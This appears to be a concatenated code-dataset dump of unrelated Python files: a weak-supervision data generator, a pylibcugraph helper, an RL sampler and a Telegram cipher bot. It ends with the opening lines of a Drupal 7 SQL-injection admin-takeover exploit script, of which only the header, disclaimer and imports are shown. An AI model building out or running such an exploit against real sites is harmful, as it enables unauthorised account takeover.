labels = list(self.generator.choice(self.n_class, size=n_data, p=self.class_prior))
clusters = list(self.generator.choice(self.n_cluster, size=n_data))
weak_labels = []
for i, y in enumerate(labels):
weak_label = []
cluster = clusters[i]
for alpha, beta, gamma, target, lf_pro_clusters in \
zip(self.alpha_l, self.beta_l, self.gamma_l, self.lf_targets, self.lf_pro_clusters):
if cluster not in lf_pro_clusters:
alpha = max(alpha - gamma, 0.1)
if target == y:
p = alpha * beta / self.class_prior[y]
else:
p = (1 - alpha) * beta / (self.class_prior[y] * (self.n_class - 1))
if self.generator.random() < p:
weak_label.append(target)
else:
weak_label.append(-1)
weak_labels.append(weak_label)
return {
'ids' : ids,
'examples' : examples,
'labels' : labels,
'weak_labels': weak_labels,
}
class CorrelatedGenerator(ConditionalIndependentGenerator):
def __init__(self,
n_class: int,
n_lfs: int,
n_overlap: Optional[int] = 0,
n_conflict: Optional[int] = 0,
n_duplicate: Optional[int] = 1,
class_prior: Optional[Union[list, np.ndarray]] = None,
lf_prior: Optional[Union[list, np.ndarray]] = None,
alpha: Optional[float] = 0.7,
beta: Optional[float] = 0.1,
alpha_radius: Optional[float] = 0.3,
overlap_theta: Optional[float] = 0.8,
conflict_theta: Optional[float] = 0.8,
random_state=None):
self.n_overlap = n_overlap
self.overlap_theta = overlap_theta
self.n_conflict = n_conflict
self.conflict_theta = conflict_theta
self.n_duplicate = n_duplicate
assert n_overlap + n_conflict + n_duplicate < n_lfs
super().__init__(n_class, n_lfs, class_prior, lf_prior, alpha, beta, alpha_radius, random_state)
lf_pool = list(range(self.n_lfs))
self.overlap_lfs = self.generator.choice(lf_pool, size=n_overlap, replace=False)
lf_pool = [i for i in lf_pool if i not in self.overlap_lfs]
self.conflict_lfs = self.generator.choice(lf_pool, size=n_conflict, replace=False)
lf_pool = [i for i in lf_pool if i not in self.conflict_lfs]
self.duplicate_lfs = self.generator.choice(lf_pool, size=n_duplicate, replace=False)
self.normal_lfs = [i for i in lf_pool if i not in self.duplicate_lfs]
self.overlap_target_lf = self.generator.choice(self.normal_lfs, size=n_overlap, replace=False)
self.conflict_target_lf = self.generator.choice(self.normal_lfs, size=n_conflict, replace=False)
self.duplicate_target_lf = self.generator.choice(self.normal_lfs, size=n_duplicate, replace=False)
self.dep_graph = []
for overlap_lf, target in zip(self.overlap_lfs, self.overlap_target_lf):
self.lf_targets[overlap_lf] = self.lf_targets[target]
self.dep_graph.append((overlap_lf, target))
for conflict_lf, target in zip(self.conflict_lfs, self.conflict_target_lf):
self.lf_targets[conflict_lf] = self.sample_other_label(self.lf_targets[target])
self.dep_graph.append((conflict_lf, target))
for duplicate_lf, target in zip(self.duplicate_lfs, self.duplicate_target_lf):
self.lf_targets[duplicate_lf] = self.lf_targets[target]
self.dep_graph.append((duplicate_lf, target))
def generate(self, n_data: int = 1000):
ids = list(range(n_data))
examples = list(range(n_data))
labels = list(self.generator.choice(self.n_class, size=n_data, p=self.class_prior))
weak_labels = []
for i, y in enumerate(labels):
weak_label = -np.ones(self.n_lfs, dtype=int)
for j in self.normal_lfs:
alpha, beta, target = self.alpha_l[j], self.beta_l[j], self.lf_targets[j]
if target == y:
p = alpha * beta / self.class_prior[y]
else:
p = (1 - alpha) * beta / (self.class_prior[y] * (self.n_class - 1))
if self.generator.random() < p:
weak_label[j] = target
for j, m in zip(self.overlap_lfs, self.overlap_target_lf):
target = self.lf_targets[j]
if weak_label[m] != -1:
if self.generator.random() < self.overlap_theta:
weak_label[j] = target
else:
alpha, beta = self.alpha_l[j], self.beta_l[j]
if target == y:
p = alpha * beta / self.class_prior[y]
else:
p = (1 - alpha) * beta / (self.class_prior[y] * (self.n_class - 1))
if self.generator.random() < p:
weak_label[j] = target
for j, m in zip(self.conflict_lfs, self.conflict_target_lf):
target = self.lf_targets[j]
if weak_label[m] != -1:
if self.generator.random() < self.conflict_theta:
weak_label[j] = target
else:
alpha, beta = self.alpha_l[j], self.beta_l[j]
if target == y:
p = alpha * beta / self.class_prior[y]
else:
p = (1 - alpha) * beta / (self.class_prior[y] * (self.n_class - 1))
if self.generator.random() < p:
weak_label[j] = target
for j, m in zip(self.duplicate_lfs, self.duplicate_target_lf):
weak_label[j] = weak_label[m]
weak_labels.append(weak_label.tolist())
return {
'ids' : ids,
'examples' : examples,
'labels' : labels,
'weak_labels': weak_labels,
}
|
<filename>wrench/synthetic/dataset_generator.py
from typing import Optional, Union
import numpy as np
from .syntheticdataset import BaseSyntheticGenerator
class ConditionalIndependentGenerator(BaseSyntheticGenerator):
def __init__(self,
n_class: int,
n_lfs: int,
class_prior: Optional[Union[list, np.ndarray]] = None,
lf_prior: Optional[Union[list, np.ndarray]] = None,
alpha: Optional[float] = 0.7,
alpha_radius: Optional[float] = 0.5,
beta: Optional[float] = 0.1,
beta_radius: Optional[float] = 0.1,
random_state=None):
super().__init__(n_class, n_lfs, class_prior, lf_prior, random_state)
self.alpha_l = self.generator.uniform(low=max(0, alpha - alpha_radius), high=min(1, alpha + alpha_radius), size=n_lfs)
self.beta_l = self.generator.uniform(low=max(0, beta - beta_radius), high=min(1, beta + beta_radius), size=n_lfs)
def generate(self, n_data: int = 1000):
ids = list(range(n_data))
examples = list(range(n_data))
labels = list(self.generator.choice(self.n_class, size=n_data, p=self.class_prior))
weak_labels = []
for i, y in enumerate(labels):
weak_label = []
for alpha, beta, target in zip(self.alpha_l, self.beta_l, self.lf_targets):
if target == y:
p = alpha * beta / self.class_prior[y]
else:
p = (1 - alpha) * beta / (self.class_prior[y] * (self.n_class - 1))
if self.generator.random() < p:
weak_label.append(target)
else:
weak_label.append(-1)
weak_labels.append(weak_label)
return {
'ids' : ids,
'examples' : examples,
'labels' : labels,
'weak_labels': weak_labels,
}
class DataDependentGenerator(ConditionalIndependentGenerator):
def __init__(self,
n_class: int,
n_lfs: int,
n_cluster: int = 10,
n_cluster_per_lfs: int = 2,
class_prior: Optional[Union[list, np.ndarray]] = None,
lf_prior: Optional[Union[list, np.ndarray]] = None,
alpha: Optional[float] = 0.7,
beta: Optional[float] = 0.1,
gamma: Optional[float] = 0.3,
alpha_radius: Optional[float] = 0.5,
random_state=None):
super().__init__(n_class, n_lfs, class_prior, lf_prior, alpha, beta, alpha_radius, random_state)
self.n_cluster = n_cluster
self.n_cluster_per_lfs = n_cluster_per_lfs
self.lf_pro_clusters = [self.generator.choice(n_cluster, size=n_cluster_per_lfs) for _ in range(n_lfs)]
self.gamma_l = self.generator.uniform(low=0, high=gamma, size=n_lfs)
def generate(self, n_data: int = 1000):
ids = list(range(n_data))
examples = list(range(n_data))
labels = list(self.generator.choice(self.n_class, size=n_data, p=self.class_prior))
clusters = list(self.generator.choice(self.n_cluster, size=n_data))
weak_labels = []
for i, y in enumerate(labels):
weak_label = []
cluster = clusters[i]
for alpha, beta, gamma, target, lf_pro_clusters in \
zip(self.alpha_l, self.beta_l, self.gamma_l, self.lf_targets, self.lf_pro_clusters):
if cluster not in lf_pro_clusters:
alpha = max(alpha - gamma, 0.1)
if target == y:
p = alpha * beta / self.class_prior[y]
else:
p = (1 - alpha) * beta / (self.class_prior[y] * (self.n_class - 1))
if self.generator.random() < p:
weak_label.append(target)
else:
weak_label.append(-1)
weak_labels.append(weak_label)
return {
'ids' : ids,
'examples' : examples,
'labels' : labels,
'weak_labels': weak_labels,
}
class CorrelatedGenerator(ConditionalIndependentGenerator):
def __init__(self,
n_class: int,
n_lfs: int,
n_overlap: Optional[int] = 0,
n_conflict: Optional[int] = 0,
n_duplicate: Optional[int] = 1,
class_prior: Optional[Union[list, np.ndarray]] = None,
lf_prior: Optional[Union[list, np.ndarray]] = None,
alpha: Optional[float] = 0.7,
beta: Optional[float] = 0.1,
alpha_radius: Optional[float] = 0.3,
overlap_theta: Optional[float] = 0.8,
conflict_theta: Optional[float] = 0.8,
random_state=None):
self.n_overlap = n_overlap
self.overlap_theta = overlap_theta
self.n_conflict = n_conflict
self.conflict_theta = conflict_theta
self.n_duplicate = n_duplicate
assert n_overlap + n_conflict + n_duplicate < n_lfs
super().__init__(n_class, n_lfs, class_prior, lf_prior, alpha, beta, alpha_radius, random_state)
lf_pool = list(range(self.n_lfs))
self.overlap_lfs = self.generator.choice(lf_pool, size=n_overlap, replace=False)
lf_pool = [i for i in lf_pool if i not in self.overlap_lfs]
self.conflict_lfs = self.generator.choice(lf_pool, size=n_conflict, replace=False)
lf_pool = [i for i in lf_pool if i not in self.conflict_lfs]
self.duplicate_lfs = self.generator.choice(lf_pool, size=n_duplicate, replace=False)
self.normal_lfs = [i for i in lf_pool if i not in self.duplicate_lfs]
self.overlap_target_lf = self.generator.choice(self.normal_lfs, size=n_overlap, replace=False)
self.conflict_target_lf = self.generator.choice(self.normal_lfs, size=n_conflict, replace=False)
self.duplicate_target_lf = self.generator.choice(self.normal_lfs, size=n_duplicate, replace=False)
self.dep_graph = []
for overlap_lf, target in zip(self.overlap_lfs, self.overlap_target_lf):
self.lf_targets[overlap_lf] = self.lf_targets[target]
self.dep_graph.append((overlap_lf, target))
for conflict_lf, target in zip(self.conflict_lfs, self.conflict_target_lf):
self.lf_targets[conflict_lf] = self.sample_other_label(self.lf_targets[target])
self.dep_graph.append((conflict_lf, target))
for duplicate_lf, target in zip(self.duplicate_lfs, self.duplicate_target_lf):
self.lf_targets[duplicate_lf] = self.lf_targets[target]
self.dep_graph.append((duplicate_lf, target))
def generate(self, n_data: int = 1000):
ids = list(range(n_data))
examples = list(range(n_data))
labels = list(self.generator.choice(self.n_class, size=n_data, p=self.class_prior))
weak_labels = []
for i, y in enumerate(labels):
weak_label = -np.ones(self.n_lfs, dtype=int)
for j in self.normal_lfs:
alpha, beta, target = self.alpha_l[j], self.beta_l[j], self.lf_targets[j]
if target == y:
p = alpha * beta / self.class_prior[y]
else:
p = (1 - alpha) * beta / (self.class_prior[y] * (self.n_class - 1))
if self.generator.random() < p:
weak_label[j] = target
for j, m in zip(self.overlap_lfs, self.overlap_target_lf):
target = self.lf_targets[j]
if weak_label[m] != -1:
if self.generator.random() < self.overlap_theta:
weak_label[j] = target
else:
alpha, beta = self.alpha_l[j], self.beta_l[j]
if target == y:
p = alpha * beta / self.class_prior[y]
else:
p = (1 - alpha) * beta / (self.class_prior[y] * (self.n_class - 1))
if self.generator.random() < p:
weak_label[j] = target
for j, m in zip(self.conflict_lfs, self.conflict_target_lf):
target = self.lf_targets[j]
if weak_label[m] != -1:
if self.generator.random() < self.conflict_theta:
weak_label[j] = target
else:
alpha, beta = self.alpha_l[j], self.beta_l[j]
if target == y:
p = alpha * beta / self.class_prior[y]
else:
p = (1 - alpha) * beta / (self.class_prior[y] * (self.n_class - 1))
if self.generator.random() < p:
weak_label[j] = target
for j, m in zip(self.duplicate_lfs, self.duplicate_target_lf):
weak_label[j] = weak_label[m]
weak_labels.append(weak_label.tolist())
return {
'ids' : ids,
'examples' : examples,
'labels' : labels,
'weak_labels': weak_labels,
}
|
none
| 1
| 2.385055
| 2
|
|
python/pylibcugraph/pylibcugraph/utilities/api_tools.py
|
AyodeAwe/cugraph
| 0
|
6628459
|
# Copyright (c) 2022, <NAME>.
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import functools
import warnings
import inspect
experimental_prefix = "EXPERIMENTAL"
def experimental_warning_wrapper(obj, make_public_name=True):
"""
Return a callable obj wrapped in a callable the prints a warning about it
being "experimental" (an object that is in the public API but subject to
change or removal) prior to calling it and returning its value.
If make_public_name is False, the object's name used in the warning message
is left unmodified. If True (default), any leading __ and/or EXPERIMENTAL
string are removed from the name used in warning messages. This allows an
object to be named with a "private" name in the public API so it can remain
hidden while it is still experimental, but have a public name within the
experimental namespace so it can be easily discovered and used.
"""
obj_name = obj.__qualname__
if make_public_name:
obj_name = obj_name.lstrip(experimental_prefix)
obj_name = obj_name.lstrip("__")
# Assume the caller of this function is the module containing the
# experimental obj and try to get its namespace name. Default to no
# namespace name if it could not be found.
call_stack = inspect.stack()
calling_frame = call_stack[1].frame
ns_name = calling_frame.f_locals.get("__name__")
if ns_name is not None:
ns_name += "."
else:
ns_name = ""
warning_msg = (f"{ns_name}{obj_name} is experimental and will change "
"or be removed in a future release.")
@functools.wraps(obj)
def callable_warning_wrapper(*args, **kwargs):
warnings.warn(warning_msg, PendingDeprecationWarning)
return obj(*args, **kwargs)
return callable_warning_wrapper
|
# Copyright (c) 2022, <NAME>.
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import functools
import warnings
import inspect
experimental_prefix = "EXPERIMENTAL"
def experimental_warning_wrapper(obj, make_public_name=True):
"""
Return a callable obj wrapped in a callable the prints a warning about it
being "experimental" (an object that is in the public API but subject to
change or removal) prior to calling it and returning its value.
If make_public_name is False, the object's name used in the warning message
is left unmodified. If True (default), any leading __ and/or EXPERIMENTAL
string are removed from the name used in warning messages. This allows an
object to be named with a "private" name in the public API so it can remain
hidden while it is still experimental, but have a public name within the
experimental namespace so it can be easily discovered and used.
"""
obj_name = obj.__qualname__
if make_public_name:
obj_name = obj_name.lstrip(experimental_prefix)
obj_name = obj_name.lstrip("__")
# Assume the caller of this function is the module containing the
# experimental obj and try to get its namespace name. Default to no
# namespace name if it could not be found.
call_stack = inspect.stack()
calling_frame = call_stack[1].frame
ns_name = calling_frame.f_locals.get("__name__")
if ns_name is not None:
ns_name += "."
else:
ns_name = ""
warning_msg = (f"{ns_name}{obj_name} is experimental and will change "
"or be removed in a future release.")
@functools.wraps(obj)
def callable_warning_wrapper(*args, **kwargs):
warnings.warn(warning_msg, PendingDeprecationWarning)
return obj(*args, **kwargs)
return callable_warning_wrapper
|
en
| 0.84412
|
# Copyright (c) 2022, <NAME>. # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. Return a callable obj wrapped in a callable the prints a warning about it being "experimental" (an object that is in the public API but subject to change or removal) prior to calling it and returning its value. If make_public_name is False, the object's name used in the warning message is left unmodified. If True (default), any leading __ and/or EXPERIMENTAL string are removed from the name used in warning messages. This allows an object to be named with a "private" name in the public API so it can remain hidden while it is still experimental, but have a public name within the experimental namespace so it can be easily discovered and used. # Assume the caller of this function is the module containing the # experimental obj and try to get its namespace name. Default to no # namespace name if it could not be found.
| 2.791401
| 3
|
src_py/rlpytorch/sampler/sampler.py
|
r-woo/elfai
| 3,305
|
6628460
|
# Copyright (c) 2018-present, Facebook, Inc.
# All rights reserved.
#
# This source code is licensed under the BSD-style license found in the
# LICENSE file in the root directory of this source tree.
from elf.options import auto_import_options, PyOptionSpec
from .sample_methods import sample_multinomial, epsilon_greedy
class Sampler(object):
@classmethod
def get_option_spec(cls):
spec = PyOptionSpec()
spec.addStrOption(
'sample_policy',
'choices of epsilon-greedy, multinomial, or uniform',
'epsilon-greedy')
spec.addBoolOption(
'store_greedy',
('if enabled, picks maximum-probability action; '
'otherwise, sample from distribution'),
False)
spec.addFloatOption(
'epsilon',
'used in epsilon-greedy',
0.0)
spec.addStrListOption(
'sample_nodes',
'nodes to be sampled and saved',
['pi,a'])
return spec
@auto_import_options
def __init__(self, option_map):
"""Initialization for Sampler."""
self.sample_nodes = []
for nodes in self.options.sample_nodes:
policy, action = nodes.split(",")
self.sample_nodes.append((policy, action))
def sample(self, state_curr):
"""Sample an action from distribution using a certain sample method
Args:
state_curr(dict): current state containing all data
"""
# TODO: This only handles epsilon_greedy and multinomial for now. Add
# uniform and original_distribution?
sampler = (epsilon_greedy
if self.options.store_greedy
else sample_multinomial)
actions = {}
for pi_node, a_node in self.sample_nodes:
actions[a_node] = sampler(state_curr, self.options, node=pi_node)
actions[pi_node] = state_curr[pi_node].data
return actions
|
# Copyright (c) 2018-present, Facebook, Inc.
# All rights reserved.
#
# This source code is licensed under the BSD-style license found in the
# LICENSE file in the root directory of this source tree.
from elf.options import auto_import_options, PyOptionSpec
from .sample_methods import sample_multinomial, epsilon_greedy
class Sampler(object):
@classmethod
def get_option_spec(cls):
spec = PyOptionSpec()
spec.addStrOption(
'sample_policy',
'choices of epsilon-greedy, multinomial, or uniform',
'epsilon-greedy')
spec.addBoolOption(
'store_greedy',
('if enabled, picks maximum-probability action; '
'otherwise, sample from distribution'),
False)
spec.addFloatOption(
'epsilon',
'used in epsilon-greedy',
0.0)
spec.addStrListOption(
'sample_nodes',
'nodes to be sampled and saved',
['pi,a'])
return spec
@auto_import_options
def __init__(self, option_map):
"""Initialization for Sampler."""
self.sample_nodes = []
for nodes in self.options.sample_nodes:
policy, action = nodes.split(",")
self.sample_nodes.append((policy, action))
def sample(self, state_curr):
"""Sample an action from distribution using a certain sample method
Args:
state_curr(dict): current state containing all data
"""
# TODO: This only handles epsilon_greedy and multinomial for now. Add
# uniform and original_distribution?
sampler = (epsilon_greedy
if self.options.store_greedy
else sample_multinomial)
actions = {}
for pi_node, a_node in self.sample_nodes:
actions[a_node] = sampler(state_curr, self.options, node=pi_node)
actions[pi_node] = state_curr[pi_node].data
return actions
|
en
| 0.83319
|
# Copyright (c) 2018-present, Facebook, Inc. # All rights reserved. # # This source code is licensed under the BSD-style license found in the # LICENSE file in the root directory of this source tree. Initialization for Sampler. Sample an action from distribution using a certain sample method Args: state_curr(dict): current state containing all data # TODO: This only handles epsilon_greedy and multinomial for now. Add # uniform and original_distribution?
| 2.129811
| 2
|
app/handlers/client.py
|
Markushik/cryptographer-bot
| 0
|
6628461
|
<gh_stars>0
import aioredis
import datetime
from aiogram import types, Dispatcher
from aiogram.dispatcher import FSMContext
from aiogram.types import CallbackQuery
from app.keyboard.buttons import inline_Main_Menu, inline_Methods_Menu_Page_1, inline_Methods_Menu_Page_2, \
inline_close_Active_button
from app.states.storage import Redis_Data
def get_realtime(realtime):
now = datetime.datetime.now()
realtime = now.strftime(f"%d.%m.%Y %H:%M")
return realtime
async def start_bot(message: types.Message, state: FSMContext):
await message.answer(
text=(
f"🤖 <b>ENIGMA</b> — <b>активно развивающийся бот</b>, главной задачей которого является шифрование и кодирование пользовательского текста\n\n"
f"🤝 <b>Сотрудничество</b>\nЕсли у вас есть предложение о совместной деятельности или бизнес интеграции, просим вас написать об этом администратору проекта"
),
reply_markup=inline_Main_Menu, parse_mode="HTML", disable_web_page_preview=True)
await state.set_state(None)
async def start_onset_button(query: CallbackQuery):
await query.message.edit_text(f"🔍 <b>Выберите метод шифрования</b>",
reply_markup=inline_Methods_Menu_Page_1, parse_mode="HTML")
await query.answer()
async def start_info_button(query: CallbackQuery):
await query.message.edit_text(
text=(
f"⚙️ <b>О Боте</b>\n\n"
f"┏ <b>Бот</b> написан на асинхронном фреймворке <a href='https://github.com/aiogram/aiogram'><b>Aiogram</b></a>\n"
f"┣ <b>Поддерживает</b> множество шифров, подробнее по <a href='http://nozdr.ru/games/quest/crypt/cipher/zamena/'><b>ссылке</b></a>\n"
f"┗ <b>Использует</b> высокопроизводительную базу данных <a href='https://redis.io'><b>Redis</b></a>\n\n"
f"🛡 Версия бота: <b>[</b><a href='https://github.com/Markushik/cryptographer-bot/commit/z8ec9c7b084a8a8b2925b33b2bc84df8858913ebb'><b>8ec9c7b</b></a><b>]</b>\n"
f"🛠 Последнее обновление: <b>17.04.2022</b>\n"
f"🎉 Новое: <b>Клавиатурный Шифр</b>\n\n"
f"🔋 Статус бота: <b>ACTIVE</b>\n"
f"🗂 База данных: <b>REDIS</b>\n"
f"👨🏻💻 Администратор: <b>@nemarK</b>\n"
),
parse_mode='HTML', disable_web_page_preview=True, reply_markup=inline_close_Active_button)
await query.answer()
async def start_privacy_button(query: CallbackQuery):
await query.message.edit_text(
text=(
f"🤖 <b>ENIGMA</b> собирает следующие данные:\n\n"
f"\t<b>• ID Пользователя в Telegram</b>\n"
f"\t<b>• Выбранные Пользователем методы</b>\n"
f"\t<b>• Вводимый текст Пользователя</b>\n\n"
f"┏ <b>Данные</b> используются исключительно <b>для анализа</b> активности Пользователей\n"
f"┣ <b>Данные</b> Пользователя <b>не передаются</b> третьим лицам\n"
f"┗ В случае несогласия Пользователь <b>обязан</b> немедленно <b>прекратить</b> использование бота\n\n"
f"<i>Последнее обновление политики конфиденциальности:</i> <b>13.04.2022</b>"
),
parse_mode='HTML', disable_web_page_preview=True, reply_markup=inline_close_Active_button)
await query.answer()
async def close_button_Active(query: CallbackQuery, state: FSMContext):
await query.message.edit_text(
text=(
f"🤖 <b>ENIGMA</b> — <b>активно развивающийся бот</b>, главной задачей которого является шифрование и кодирование пользовательского текста\n\n"
f"🤝 <b>Сотрудничество</b>\nЕсли у вас есть предложение о совместной деятельности или бизнес интеграции, просим вас написать об этом администратору проекта"
),
reply_markup=inline_Main_Menu, parse_mode="HTML", disable_web_page_preview=True)
await state.set_state(None)
await query.answer()
async def close_button_Page_2(query: CallbackQuery, state: FSMContext):
await query.message.edit_text(f"🔍 <b>Выберите метод шифрования</b>",
reply_markup=inline_Methods_Menu_Page_1, parse_mode="HTML")
await state.set_state(None)
await query.answer()
async def go_button(query: CallbackQuery):
await query.message.edit_text(f"🔍 <b>Выберите метод шифрования</b>",
reply_markup=inline_Methods_Menu_Page_2, parse_mode="HTML")
await query.answer()
async def start_stats_button(query: CallbackQuery, state: FSMContext):
realtime = ""
redis = aioredis.from_url("redis://localhost", port=49154, password="<PASSWORD>", db=5, decode_responses=True)
await redis.sadd("users", query.from_user.id)
val = await redis.scard(name="users")
await query.message.edit_text(
text=(
f"📊 <b>Статистика</b>\n\n"
f"🕔 Статистика на <b>{get_realtime(realtime)}</b>\n"
f"🆔 Ваш ID: <b>{query.from_user.id}</b>\n"
f"📅 Дата начала пользования:\n"
f"👨👩👧👦 Пользователей: <b>{val}</b>\n"
f"⚡ Скорость ответа: <b>0.41 сек</b>\n"
),
parse_mode="HTML", reply_markup=inline_close_Active_button)
await state.set_state(Redis_Data.REDIS_USERS)
await query.answer()
async def close_button_End_Encoding(query: CallbackQuery):
await query.message.edit_text(f"🔍 <b>Выберите метод шифрования</b>",
reply_markup=inline_Methods_Menu_Page_1, parse_mode="HTML")
await query.answer()
def register_handlers(dp: Dispatcher):
dp.register_message_handler(start_bot, commands="start", state="*")
dp.register_callback_query_handler(start_onset_button, text=['Onset_data'])
dp.register_callback_query_handler(start_info_button, text=['Info_data'])
dp.register_callback_query_handler(start_privacy_button, text=['Privacy_data'])
dp.register_callback_query_handler(close_button_Active, text=['close_Active_data'], state="*")
dp.register_callback_query_handler(close_button_Page_2, text=['back_to_Menu_Page_1_data'], state="*")
dp.register_callback_query_handler(go_button, text=['go_Menu_Page_2_data'])
dp.register_callback_query_handler(close_button_End_Encoding, text=['close_End_Encoding_data'])
dp.register_callback_query_handler(start_stats_button, text=['Stats_data'])
|
import aioredis
import datetime
from aiogram import types, Dispatcher
from aiogram.dispatcher import FSMContext
from aiogram.types import CallbackQuery
from app.keyboard.buttons import inline_Main_Menu, inline_Methods_Menu_Page_1, inline_Methods_Menu_Page_2, \
inline_close_Active_button
from app.states.storage import Redis_Data
def get_realtime(realtime):
now = datetime.datetime.now()
realtime = now.strftime(f"%d.%m.%Y %H:%M")
return realtime
async def start_bot(message: types.Message, state: FSMContext):
await message.answer(
text=(
f"🤖 <b>ENIGMA</b> — <b>активно развивающийся бот</b>, главной задачей которого является шифрование и кодирование пользовательского текста\n\n"
f"🤝 <b>Сотрудничество</b>\nЕсли у вас есть предложение о совместной деятельности или бизнес интеграции, просим вас написать об этом администратору проекта"
),
reply_markup=inline_Main_Menu, parse_mode="HTML", disable_web_page_preview=True)
await state.set_state(None)
async def start_onset_button(query: CallbackQuery):
await query.message.edit_text(f"🔍 <b>Выберите метод шифрования</b>",
reply_markup=inline_Methods_Menu_Page_1, parse_mode="HTML")
await query.answer()
async def start_info_button(query: CallbackQuery):
await query.message.edit_text(
text=(
f"⚙️ <b>О Боте</b>\n\n"
f"┏ <b>Бот</b> написан на асинхронном фреймворке <a href='https://github.com/aiogram/aiogram'><b>Aiogram</b></a>\n"
f"┣ <b>Поддерживает</b> множество шифров, подробнее по <a href='http://nozdr.ru/games/quest/crypt/cipher/zamena/'><b>ссылке</b></a>\n"
f"┗ <b>Использует</b> высокопроизводительную базу данных <a href='https://redis.io'><b>Redis</b></a>\n\n"
f"🛡 Версия бота: <b>[</b><a href='https://github.com/Markushik/cryptographer-bot/commit/z8ec9c7b084a8a8b2925b33b2bc84df8858913ebb'><b>8ec9c7b</b></a><b>]</b>\n"
f"🛠 Последнее обновление: <b>17.04.2022</b>\n"
f"🎉 Новое: <b>Клавиатурный Шифр</b>\n\n"
f"🔋 Статус бота: <b>ACTIVE</b>\n"
f"🗂 База данных: <b>REDIS</b>\n"
f"👨🏻💻 Администратор: <b>@nemarK</b>\n"
),
parse_mode='HTML', disable_web_page_preview=True, reply_markup=inline_close_Active_button)
await query.answer()
async def start_privacy_button(query: CallbackQuery):
await query.message.edit_text(
text=(
f"🤖 <b>ENIGMA</b> собирает следующие данные:\n\n"
f"\t<b>• ID Пользователя в Telegram</b>\n"
f"\t<b>• Выбранные Пользователем методы</b>\n"
f"\t<b>• Вводимый текст Пользователя</b>\n\n"
f"┏ <b>Данные</b> используются исключительно <b>для анализа</b> активности Пользователей\n"
f"┣ <b>Данные</b> Пользователя <b>не передаются</b> третьим лицам\n"
f"┗ В случае несогласия Пользователь <b>обязан</b> немедленно <b>прекратить</b> использование бота\n\n"
f"<i>Последнее обновление политики конфиденциальности:</i> <b>13.04.2022</b>"
),
parse_mode='HTML', disable_web_page_preview=True, reply_markup=inline_close_Active_button)
await query.answer()
async def close_button_Active(query: CallbackQuery, state: FSMContext):
await query.message.edit_text(
text=(
f"🤖 <b>ENIGMA</b> — <b>активно развивающийся бот</b>, главной задачей которого является шифрование и кодирование пользовательского текста\n\n"
f"🤝 <b>Сотрудничество</b>\nЕсли у вас есть предложение о совместной деятельности или бизнес интеграции, просим вас написать об этом администратору проекта"
),
reply_markup=inline_Main_Menu, parse_mode="HTML", disable_web_page_preview=True)
await state.set_state(None)
await query.answer()
async def close_button_Page_2(query: CallbackQuery, state: FSMContext):
await query.message.edit_text(f"🔍 <b>Выберите метод шифрования</b>",
reply_markup=inline_Methods_Menu_Page_1, parse_mode="HTML")
await state.set_state(None)
await query.answer()
async def go_button(query: CallbackQuery):
await query.message.edit_text(f"🔍 <b>Выберите метод шифрования</b>",
reply_markup=inline_Methods_Menu_Page_2, parse_mode="HTML")
await query.answer()
async def start_stats_button(query: CallbackQuery, state: FSMContext):
realtime = ""
redis = aioredis.from_url("redis://localhost", port=49154, password="<PASSWORD>", db=5, decode_responses=True)
await redis.sadd("users", query.from_user.id)
val = await redis.scard(name="users")
await query.message.edit_text(
text=(
f"📊 <b>Статистика</b>\n\n"
f"🕔 Статистика на <b>{get_realtime(realtime)}</b>\n"
f"🆔 Ваш ID: <b>{query.from_user.id}</b>\n"
f"📅 Дата начала пользования:\n"
f"👨👩👧👦 Пользователей: <b>{val}</b>\n"
f"⚡ Скорость ответа: <b>0.41 сек</b>\n"
),
parse_mode="HTML", reply_markup=inline_close_Active_button)
await state.set_state(Redis_Data.REDIS_USERS)
await query.answer()
async def close_button_End_Encoding(query: CallbackQuery):
await query.message.edit_text(f"🔍 <b>Выберите метод шифрования</b>",
reply_markup=inline_Methods_Menu_Page_1, parse_mode="HTML")
await query.answer()
def register_handlers(dp: Dispatcher):
dp.register_message_handler(start_bot, commands="start", state="*")
dp.register_callback_query_handler(start_onset_button, text=['Onset_data'])
dp.register_callback_query_handler(start_info_button, text=['Info_data'])
dp.register_callback_query_handler(start_privacy_button, text=['Privacy_data'])
dp.register_callback_query_handler(close_button_Active, text=['close_Active_data'], state="*")
dp.register_callback_query_handler(close_button_Page_2, text=['back_to_Menu_Page_1_data'], state="*")
dp.register_callback_query_handler(go_button, text=['go_Menu_Page_2_data'])
dp.register_callback_query_handler(close_button_End_Encoding, text=['close_End_Encoding_data'])
dp.register_callback_query_handler(start_stats_button, text=['Stats_data'])
|
none
| 1
| 2.228271
| 2
|
|
ICG-AutoExploiter/ICG-AutoExploiterBoT-006f76867be3e896ba340f8bb08ba3b5396f1cb2/files/adminTakeoverdupal.py
|
KC1111/Backup
| 0
|
6628462
|
#!/usr/bin/python
#
#
# Drupal 7.x SQL Injection SA-CORE-2014-005 https://www.drupal.org/SA-CORE-2014-005
# Inspired by yukyuk's P.o.C (https://www.reddit.com/user/fyukyuk)
#
# Tested on Drupal 7.31 with BackBox 3.x
#
# This material is intended for educational
# purposes only and the author can not be held liable for
# any kind of damages done whatsoever to your machine,
# or damages caused by some other,creative application of this material.
# In any case you disagree with the above statement,stop here.
import hashlib, urllib2, optparse, random, sys
# START - from drupalpass import DrupalHash # https://github.com/cvangysel/gitexd-drupalorg/blob/master/drupalorg/drupalpass.py
# Calculate a non-truncated Drupal 7 compatible password hash.
# The consumer of these hashes must truncate correctly.
r = '\033[31m'
g = '\033[32m'
y = '\033[33m'
b = '\033[34m'
m = '\033[35m'
c = '\033[36m'
